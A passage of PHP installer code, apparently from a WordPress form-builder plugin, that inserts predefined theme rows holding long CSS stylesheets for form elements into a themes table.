2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(22, \'Theme 06 orange\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #FAB17A;\r\nmargin-bottom: 10px;\r\ncolor: #FAB17A;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #473C34;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #FFA15C;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #C78655;\r\n}\r\n\r\n.next-page div.wdform-page-button:hover {\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #FAB17A;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.button-submit {\r\ncolor: #473C34;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 35px;\r\nline-height: 35px;\r\nbackground: #FFA15C;\r\npadding: 0px 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder: 1px solid #C78655;\r\n}\r\n.button-submit:hover {\r\n	background: #FAB17A;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #FFA15C ;\r\n	color: #030303;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #FFA15C ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #342114;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #C78655;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #342114;\r\n	cursor: pointer;\r\n	background-color: #FF8A34;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #FF8932 ;\r\n	background: -moz-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F3BA28 ), color-stop(39%, #FFD325 ), color-stop(100%, #FEB824 ));\r\n	background: -o-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\nbackground: -ms-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\nbackground: -webkit-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\n\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\nbackground-color: #ECBE9C;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #473C34;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(23, \'Theme 06 transparent (light green button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #FFFFFF;\r\nborder: 1px solid #90EE90;\r\nmargin-bottom: 10px;\r\ncolor: #90EE90;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #473C34;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #6BD86B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #459B45;\r\n}\r\n\r\n.next-page div.wdform-page-button:hover {\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #90EE90;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 